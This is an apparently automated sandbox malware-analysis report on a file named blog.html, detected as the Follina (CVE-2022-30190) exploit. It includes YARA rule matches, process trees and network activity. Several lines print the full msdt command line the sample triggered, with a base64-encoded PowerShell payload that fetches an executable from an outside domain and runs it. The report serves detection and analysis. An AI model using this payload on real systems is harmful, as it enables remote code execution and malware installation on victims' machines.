Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
blog.html

Overview

General Information

Sample Name:blog.html
Analysis ID:654145
MD5:fef2b6879c54b532ac0700113dd4173c
SHA1:824bfa2bbfbe11c7810f1a857ecf1d7d64fe2743
SHA256:9d16c6ba4ec1c23f9e35c05b6e17425fdc6cf4d5a3d5ea100129b24c21d68b7d
Tags:Follinahtml
Infos:

Detection

Follina CVE-2022-30190
Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
IP address seen in connection with other malware

Classification

  • System is w10x64
  • chrome.exe (PID: 6260 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\blog.html MD5: C139654B5C1438A95B321BB01AD63EF6)
    • chrome.exe (PID: 6420 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1528,2458455930681396657,16758854869973346526,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1948 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
    • msdt.exe (PID: 6900 cmdline: "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aXdyIGh0dHBzOi8vY29uc3VtZXJmaW5hbmNlZ3VpZGUuY29tL2Jsb2cvaW5kZXgvZ3B1cGRhdGUuZXhlIC1PdXRGaWxlIEM6XFdpbmRvd3NcVGFza3NcZ3B1cGRhdGUuZXhlOyBDOlxXaW5kb3dzXFRhc2tzXGdwdXBkYXRlLmV4ZQo='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22 MD5: 8BE43BAF1F37DA5AB31A53CA1C07EE0C)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
blog.htmlSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
  • 0x25:$a: PCWDiagnostic
  • 0x19:$sa3: ms-msdt
  • 0x79:$sb3: IT_BrowseForFile=
blog.htmlEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
  • 0x8:$re1: location.href = "ms-msdt:
blog.htmlJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
    SourceRuleDescriptionAuthorStrings
    0000000E.00000002.672988587.00000215ED760000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      0000000E.00000002.673016389.00000215ED769000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
        0000000E.00000002.673521929.00000215ED874000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          Exploits

          barindex
          Source: Yara matchFile source: blog.html, type: SAMPLE
          Source: Yara matchFile source: 0000000E.00000002.672988587.00000215ED760000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.673016389.00000215ED769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.673521929.00000215ED874000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
          Source: unknownDNS traffic detected: queries for: accounts.google.com
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-GB&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfmX-Goog-Update-Updater: chromecrx-85.0.4183.121Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
          Source: pnacl_public_x86_64_pnacl_sz_nexe.0.dr, pnacl_public_x86_64_pnacl_llc_nexe.0.drString found in binary or memory: http://llvm.org/):
          Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.drString found in binary or memory: https://accounts.google.com
          Source: craw_window.js.0.drString found in binary or memory: https://accounts.google.com/MergeSession
          Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.drString found in binary or memory: https://apis.google.com
          Source: pnacl_public_x86_64_libpnacl_irt_shim_dummy_a.0.drString found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-clang.git
          Source: pnacl_public_x86_64_libpnacl_irt_shim_dummy_a.0.drString found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-llvm.git
          Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.drString found in binary or memory: https://clients2.google.com
          Source: manifest.json1.0.dr, manifest.json.0.drString found in binary or memory: https://clients2.google.com/service/update2/crx
          Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.drString found in binary or memory: https://clients2.googleusercontent.com
          Source: pnacl_public_x86_64_ld_nexe.0.drString found in binary or memory: https://code.google.com/p/nativeclient/issues/entry
          Source: pnacl_public_x86_64_ld_nexe.0.drString found in binary or memory: https://code.google.com/p/nativeclient/issues/entry%s:
          Source: 84e1d201-80a6-4e6e-9f8a-7dcb319e9d15.tmp.1.dr, 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 7bb7e723-11a5-43d8-abb5-a21c25034ef8.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.drString found in binary or memory: https://dns.google
          Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.drString found in binary or memory: https://fonts.googleapis.com
          Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.drString found in binary or memory: https://fonts.gstatic.com
          Source: craw_window.js.0.dr, craw_background.js.0.drString found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
          Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.drString found in binary or memory: https://ogs.google.com
          Source: craw_window.js.0.dr, manifest.json.0.drString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
          Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.drString found in binary or memory: https://play.google.com
          Source: 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.drString found in binary or memory: https://r5---sn-h0jeln7l.gvt1.com
          Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.drString found in binary or memory: https://redirector.gvt1.com
          Source: craw_window.js.0.dr, manifest.json.0.drString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
          Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.drString found in binary or memory: https://ssl.gstatic.com
          Source: craw_window.js.0.dr, craw_background.js.0.drString found in binary or memory: https://www-googleapis-staging.sandbox.google.com
          Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.drString found in binary or memory: https://www.google.com
          Source: manifest.json.0.drString found in binary or memory: https://www.google.com/
          Source: craw_window.js.0.drString found in binary or memory: https://www.google.com/accounts/OAuthLogin?issueuberauth=1
          Source: craw_window.js.0.drString found in binary or memory: https://www.google.com/images/cleardot.gif
          Source: craw_window.js.0.drString found in binary or memory: https://www.google.com/images/dot2.gif
          Source: craw_window.js.0.drString found in binary or memory: https://www.google.com/images/x2.gif
          Source: craw_background.js.0.drString found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
          Source: craw_window.js.0.dr, craw_background.js.0.dr, 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.drString found in binary or memory: https://www.googleapis.com
          Source: manifest.json.0.drString found in binary or memory: https://www.googleapis.com/
          Source: manifest.json.0.drString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
          Source: manifest.json.0.drString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
          Source: manifest.json.0.drString found in binary or memory: https://www.googleapis.com/auth/sierra
          Source: manifest.json.0.drString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
          Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.drString found in binary or memory: https://www.gstatic.com
          Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
          Source: blog.html, type: SAMPLEMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-20
          Source: blog.html, type: SAMPLEMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Local\Temp\4bb935c4-12fa-4ae6-9272-8704f42aef9e.tmpJump to behavior
          Source: C:\Windows\System32\msdt.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: classification engineClassification label: mal48.expl.winHTML@32/121@2/8
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\blog.html
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1528,2458455930681396657,16758854869973346526,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1948 /prefetch:8
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aXdyIGh0dHBzOi8vY29uc3VtZXJmaW5hbmNlZ3VpZGUuY29tL2Jsb2cvaW5kZXgvZ3B1cGRhdGUuZXhlIC1PdXRGaWxlIEM6XFdpbmRvd3NcVGFza3NcZ3B1cGRhdGUuZXhlOyBDOlxXaW5kb3dzXFRhc2tzXGdwdXBkYXRlLmV4ZQo='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1528,2458455930681396657,16758854869973346526,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1948 /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aXdyIGh0dHBzOi8vY29uc3VtZXJmaW5hbmNlZ3VpZGUuY29tL2Jsb2cvaW5kZXgvZ3B1cGRhdGUuZXhlIC1PdXRGaWxlIEM6XFdpbmRvd3NcVGFza3NcZ3B1cGRhdGUuZXhlOyBDOlxXaW5kb3dzXFRhc2tzXGdwdXBkYXRlLmV4ZQo='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-62BBFD6F-1874.pmaJump to behavior
          Source: C:\Windows\System32\msdt.exeAutomated click: Next
          Source: C:\Windows\System32\msdt.exeAutomated click: Next
          Source: C:\Windows\System32\msdt.exeAutomated click: Next
          Source: C:\Windows\System32\msdt.exeAutomated click: Next
          Source: C:\Windows\System32\msdt.exeAutomated click: Next
          Source: C:\Windows\System32\msdt.exeAutomated click: Next
          Source: C:\Windows\System32\msdt.exeAutomated click: Next
          Source: C:\Windows\System32\msdt.exeAutomated click: Next
          Source: C:\Windows\System32\msdt.exeAutomated click: Next
          Source: C:\Windows\System32\msdt.exeAutomated click: Next
          Source: C:\Windows\System32\msdt.exeAutomated click: Next
          Source: C:\Windows\System32\msdt.exeAutomated click: Next
          Source: C:\Windows\System32\msdt.exeAutomated click: Next
          Source: C:\Windows\System32\msdt.exeAutomated click: Next
          Source: C:\Windows\System32\msdt.exeAutomated click: Next
          Source: C:\Windows\System32\msdt.exeAutomated click: Next
          Source: C:\Windows\System32\msdt.exeAutomated click: Next
          Source: C:\Windows\System32\msdt.exeFile opened: C:\Windows\system32\MSFTEDIT.DLLJump to behavior
          Source: C:\Windows\System32\msdt.exeWindow / User API: threadDelayed 1850Jump to behavior
          Source: C:\Windows\System32\msdt.exeWindow / User API: threadDelayed 1170Jump to behavior